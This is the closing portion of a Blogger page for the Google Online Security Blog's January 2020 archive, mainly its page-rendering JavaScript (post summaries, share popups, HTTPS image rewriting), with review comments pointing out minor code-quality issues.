src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmruMUNSjAUsU-iCQjxgiqufl2u1wHJfiVTn3wuiIZAK1VUSRsexREPAOLV0N4-4VVtaYbZL18UsVh5CUlUJWH5UurFiQKMkHlNnj3YYw-2UiYtbNbvBE7VsAhdtw9rwNuOc-riC1exNkp/s1600/facebook-logo.png" />Follow</a> </div> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML1'> <div 
class='widget-content'> Give us feedback in our <a href="https://support.google.com/bin/static.py?hl=en&page=portal_groups.cs">Product Forums</a>. </div> <div class='clear'></div> </div></div> </div> </div> <div style='clear:both;'></div> </div> <!-- Footer -->
<!-- NOTE(review): the footer links use protocol-relative '//' URLs, which inherit the page's scheme; explicit https: URLs are preferable. The logo <img> has an empty src and no alt attribute. The 'loading' class on the outer div is one of those removed by BreakpointHandler.initContent() below once post content has been injected. -->
<div class='google-footer-outer loading'> <div id='google-footer'> <a href='//www.google.com/'> <img class='google-logo-dark' height='36' src='' style='margin-top: -16px;' width='92'/> </a> <ul> <li> <a href='//www.google.com/'> Google </a> </li> <li> <a href='//www.google.com/policies/privacy/'> Privacy </a> </li> <li> <a href='//www.google.com/policies/terms/'> Terms </a> </li> </ul> </div> </div>
<script type='text/javascript'> //<![CDATA[
// Social sharing popups.
/* Every element with class 'social-wrapper' gets a click handler that opens the
   URL held in its data-href attribute in a 500x500 popup window.
   NOTE(review): the loop index i is assigned without var, so it leaks as an
   implicit global.
   NOTE(review): window.open is called without the 'noopener' feature, so the
   popup keeps a window.opener reference back to this page. The data-href
   values presumably come from the blog template rather than user input -
   verify where the .social-wrapper elements are generated. */
var postEl = document.getElementsByClassName('social-wrapper'); var postCount = postEl.length; for(i=0; i<postCount;i++){ postEl[i].addEventListener("click", function(event){ var postUrl = this.getAttribute("data-href"); window.open( postUrl,'popUpWindow','height=500,width=500,left=10,top=10,resizable=yes,scrollbars=yes,toolbar=yes,menubar=no,location=no,directories=no,status=yes'); });}
//]]> </script>
<script type='text/javascript'> //<![CDATA[
/* BreakpointHandler: page-level helper that works out what kind of page this
   is (list page, mobile view, home page) and renders each post body from its
   embedded template, adding a short summary on list pages.
   Fields: initted - read by process() below; isHomePage and isMobile - set by
   detect(). detect() also assigns isListPage, which is not initialised here. */
var BreakpointHandler = function() { this.initted = false; this.isHomePage = false; this.isMobile = false; };
/* finalizeSummary: strips trailing whitespace and <br> tags from summaryHtml
   and appends ' ...' when the summary stops mid-sentence.
   summaryHtml - HTML string accumulated so far.
   lastNode - the DOM node at which the summary was cut off.
   Text node (nodeType 3): unless the last character is one of . ” " ? a
   trailing non-letter character is dropped and ' ...' is appended.
   <i> or <a> element (nodeType 1): ' ...' is appended unconditionally.
   Returns the finished summary HTML. */
BreakpointHandler.prototype.finalizeSummary = function(summaryHtml, lastNode) {
// Use $.trim for IE8 compatibility
summaryHtml = $.trim(summaryHtml).replace(/(<br>|\s)+$/,''); if (lastNode.nodeType == 3) { var lastChar = summaryHtml.slice(-1); if (!lastChar.match(/[.”"?]/)) { if (!lastChar.match(/[A-Za-z]/)) { summaryHtml = summaryHtml.slice(0, -1); } summaryHtml += ' ...'; } } else if (lastNode.nodeType == 1 && (lastNode.nodeName == 'I' || lastNode.nodeName == 'A')) { summaryHtml += ' ...'; } return summaryHtml; };
/* generateSummaryFromContent: builds an HTML summary of about numWords words
   from the direct children of content.
   content - the rendered .post-content element (already in the DOM).
   numWords - word budget; the summary is finalized at the child that reaches it.
   Element children are copied via outerHTML, text children via nodeValue.
   Elements carrying data-about-pullquote are skipped. A <div> or <b> child is
   skipped while fewer than 10 words have been seen, and otherwise ends the
   summary early (finalized at the preceding child).
   Returns the summary HTML string.
   NOTE(review): text-node nodeValue is appended unescaped to an HTML string
   that initContent() later assigns to innerHTML, so a literal '<' or '&' in
   post text would be re-parsed as markup. The content is the page's own post
   body, so this is a correctness rather than injection concern, but it should
   be escaped if such characters can occur.
   NOTE(review): nodeText stays undefined for any child that is neither an
   element nor a text node (e.g. a comment node, nodeType 8), so the
   nodeText.match call below would throw a TypeError for such children. */
BreakpointHandler.prototype.generateSummaryFromContent = function(content, numWords) { var seenWords = 0; var summaryHtml = ''; for (var i=0; i < content.childNodes.length; i++) {
var node = content.childNodes[i]; var nodeText; if (node.nodeType == 1) { if (node.hasAttribute('data-about-pullquote')) { continue; } nodeText = node.textContent; if (nodeText === undefined) {
// innerText for IE8
nodeText = node.innerText; } if (node.nodeName == 'DIV' || node.nodeName == 'B') {
// Don't end early if we haven't seen enough words.
if (seenWords < 10) { continue; } if (i > 0) { summaryHtml = this.finalizeSummary(summaryHtml, content.childNodes[i-1]); } break; } summaryHtml += node.outerHTML; } else if (node.nodeType == 3) { nodeText = node.nodeValue; summaryHtml += nodeText + ' '; } var words = nodeText.match(/\S+\s*/g); if (!words) { continue; } var remain = numWords - seenWords; if (words.length >= remain) { summaryHtml = this.finalizeSummary(summaryHtml, node); break; } seenWords += words.length; } return summaryHtml; };
/* detect: reads the page state this handler depends on.
   Parses window.location.search into urlParams ('+' decoded as a space, then
   decodeURIComponent), then sets isListPage from the 'list-page' class on
   <html>, isMobile from the query parameter m=1, and isHomePage from a
   pathname of '/'.
   NOTE(review): decodeURIComponent throws a URIError on a malformed
   percent-escape, so a malformed query string aborts detect() before any flag
   is set; wrapping decode in try/catch would let it fail soft. */
BreakpointHandler.prototype.detect = function() { var match, pl = /\+/g, search = /([^&=]+)=?([^&]*)/g, decode = function (s) { return decodeURIComponent(s.replace(pl, " ")); }, query = window.location.search.substring(1); var urlParams = {}; while (match = search.exec(query)) urlParams[decode(match[1])] = decode(match[2]); this.isListPage = $('html').hasClass('list-page'); this.isMobile = urlParams['m'] === '1'; this.isHomePage = window.location.pathname == '/'; };
/* initContent: renders every .post on the page.
   For each post the template HTML is read from the <script> child of
   .post-content, passed through self.rewriteForSSL (defined outside this
   excerpt), and injected with innerHTML. In preview mode (body class
   'is-preview') an editor-provided preview is split off via the
   data-is-preview regex. On list pages a .post-summary div is inserted before
   the content, holding either that preview or a generated 30-word summary,
   followed by a clone of the title link relabelled 'Read More'.
   Afterwards <br> tags are replaced by span.space on Firefox and the
   'loading' class is removed from every element carrying it (the footer
   wrapper above is one of them).
   Note: 'var match' is hoisted to the per-post callback's scope, so the
   later 'if (match)' is simply false when not in preview mode. */
BreakpointHandler.prototype.initContent = function() { var self = this; $('.post').each(function(index) { var body = $(this).children('.post-body')[0]; var content = $(body).children('.post-content')[0]; $(content).addClass('post-original'); var data = $(content).children('script').html(); data = self.rewriteForSSL(data); if (document.body.className.indexOf('is-preview') !== -1) {
// If exists, extract specified editor's preview.
var match = data.match(/([\s\S]+?)<div data-is-preview.+?>([\s\S]+)<\/div>/m); if (match) { data = match[1]; } }
// Prevent big images from loading when they aren't needed.
// This must be done as a pre-injection step, since image loading can't be
// canceled once embedded into the DOM.
/* NOTE(review): this regex strip is a bandwidth optimisation, not a
   sanitiser; the template is the page's own post markup (read from its
   <script> element) and is inserted below as trusted HTML. */
if (self.isListPage && self.isMobile) { data = data.replace(/<(img|iframe) .+?>/g, ''); }
// Insert template to be rendered as nodes.
content.innerHTML = data; if (self.isListPage) { var summary = document.createElement('div'); $(summary).addClass('post-content'); $(summary).addClass('post-summary'); body.insertBefore(summary, content); if (match) {
// Use provided summary.
summary.innerHTML = match[2]; } else {
// Generate a summary.
// Summary generation relies on DOM, so it must occur after content is
// inserted into the page.
summary.innerHTML = self.generateSummaryFromContent(content, 30); }
// Add read more link to summary.
var titleAnchor = $(this).find('.title a')[0]; var link = titleAnchor.cloneNode(true); link.innerHTML = 'Read More'; $(link).addClass('read-more'); summary.appendChild(link); } });
// Firefox does not allow for proper styling of BR.
if (navigator.userAgent.indexOf('Firefox') > -1) { $('.post-content br').replaceWith('<span class="space"></span>'); } $('.loading').removeClass('loading'); };
/* process: one-time setup guarded by this.initted. It begins by defining
   makeInsecureImageRegex, which joins a list of trusted image hosts into a
   regex alternation (dots escaped). The rest of this method lies beyond the
   end of this excerpt. */
BreakpointHandler.prototype.process = function() { if (!this.initted) { var makeInsecureImageRegex = function(hosts) { var whitelist = hosts.join('|').replace(/\./g,'\\.');
// Normal image tags, plus input images (yes, this is possible!)
return new RegExp('(<(img|input)[^>]+?src=("|\'))http:\/\/(' + whitelist +')', 'g'); }; this.sslImageRegex = makeInsecureImageRegex(BreakpointHandler.KNOWN_HTTPS_HOSTS); this.sslImageCurrentDomainRegex = makeInsecureImageRegex([window.location.hostname]); this.detect(); this.initContent(); this.initted = true; } }; BreakpointHandler.KNOWN_HTTPS_HOSTS = [ "www.google.org", "www.google.com", "services.google.com", "blogger.com", "draft.blogger.com", "www.blogger.com", "photos1.blogger.com", "photos2.blogger.com", "photos3.blogger.com", "blogblog.com", "img1.blogblog.com", "img2.blogblog.com", "www.blogblog.com", "www1.blogblog.com", "www2.blogblog.com", "0.bp.blogspot.com", "1.bp.blogspot.com", "2.bp.blogspot.com", "3.bp.blogspot.com", "4.bp.blogspot.com", "lh3.googleusercontent.com", "lh4.googleusercontent.com", "lh5.googleusercontent.com", "lh6.googleusercontent.com", "themes.googleusercontent.com", ]; BreakpointHandler.prototype.rewriteForSSL = function(html) { // Handle HTTP -> HTTPS source replacement of images, movies, and other embedded content. return html.replace(this.sslImageRegex, '$1https://$4') .replace(this.sslImageCurrentDomainRegex, '$1//$4') .replace(/(<(embed|iframe)[^>]+?src=("|'))http:\/\/([^"']*?(youtube|picasaweb\.google)\.com)/g, '$1https://$4') // Slideshow SWF takes a image host, so we need to rewrite that parameter. .replace(/(<embed[^>]+?feed=http(?=[^s]))/g, '$1s'); }; $(document).ready(function() { var handler = new BreakpointHandler(); handler.process(); // Top-level navigation. $(".BlogArchive .tab").click(function(ev) { ev.preventDefault(); $(this).parent().toggleClass('active'); $(this).siblings().slideToggle(300); }); $(".Label .tab").click(function(ev) { ev.preventDefault(); $(this).parent().toggleClass('active'); $(this).siblings().slideToggle(300); }); // Blog archive year expansion. 
$('.BlogArchive .intervalToggle').click(function(ev) { ev.preventDefault(); if ($(this).parent().hasClass('collapsed')) { $(this).parent().removeClass('collapsed'); $(this).parent().addClass('expanded'); } else { $(this).parent().removeClass('expanded'); $(this).parent().addClass('collapsed'); } }); // Reverse order of months. $('.BlogArchive .intervalToggle + div').each(function(_, items) { var year = $(this); year.children().each(function(_, month) { year.prepend(month); }); }); // Set anchors to open in new tab. $('.post-content img').parent().each(function(_, node) { if (node.nodeName == 'A') { $(this).attr('target', '_blank'); } }); // Process search requests. $('.searchBox input').on("keypress", function(ev) { if (ev.which == 13) { window.location.href = 'https://www.google.com/search?q=site%3A' + window.location.hostname + '%20' + encodeURIComponent ($(this).val()); } }); }); //]]> </script> <script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/984859869-widgets.js"></script> <script type='text/javascript'> window['__wavt'] = 'AOuZoY5tygZCkLjjkvSKkmBOtXBfM-caMA:1732438288314';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d1176949257541686127','//security.googleblog.com/2020/01/','1176949257541686127'); _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '1176949257541686127', 'title': 'Google Online Security Blog', 'url': 'https://security.googleblog.com/2020/01/', 'canonicalUrl': 'https://security.googleblog.com/2020/01/', 'homepageUrl': 'https://security.googleblog.com/', 'searchUrl': 'https://security.googleblog.com/search', 'canonicalHomepageUrl': 'https://security.googleblog.com/', 'blogspotFaviconUrl': 'https://security.googleblog.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': true, 'httpsEnabled': true, 'enabledCommentProfileImages': false, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': 'G-K46T604G22', 'analytics4': true, 
'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Google Online Security Blog - Atom\x22 href\x3d\x22https://security.googleblog.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22Google Online Security Blog - RSS\x22 href\x3d\x22https://security.googleblog.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Google Online Security Blog - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/1176949257541686127/posts/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/d78375fb222d99b3', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'X', 'key': 'twitter', 'shareMessage': 'Share to X', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript 
type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27en\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'archive', 'pageName': 'January 2020', 'pageTitle': 'Google Online Security Blog: January 2020'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'Google Online Security Blog', 'description': 'The latest news and insights from Google on security and safety on the Internet', 'url': 'https://security.googleblog.com/2020/01/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': false, 'isArchive': true, 'isLabelSearch': false, 'archive': {'year': 2020, 'month': 1, 'rangeMessage': 'Showing posts from January, 2020'}}}]); _WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML8', 'sidebar-top', document.getElementById('HTML8'), {}, 'displayModeFull')); 
_WidgetManager._RegisterWidget('_LabelView', new _WidgetInfo('Label1', 'sidebar', document.getElementById('Label1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar', document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Loading\x26hellip;'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML6', 'sidebar', document.getElementById('HTML6'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML5', 'sidebar-bottom', document.getElementById('HTML5'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'sidebar-bottom', document.getElementById('HTML1'), {}, 'displayModeFull')); </script> </body> </html>
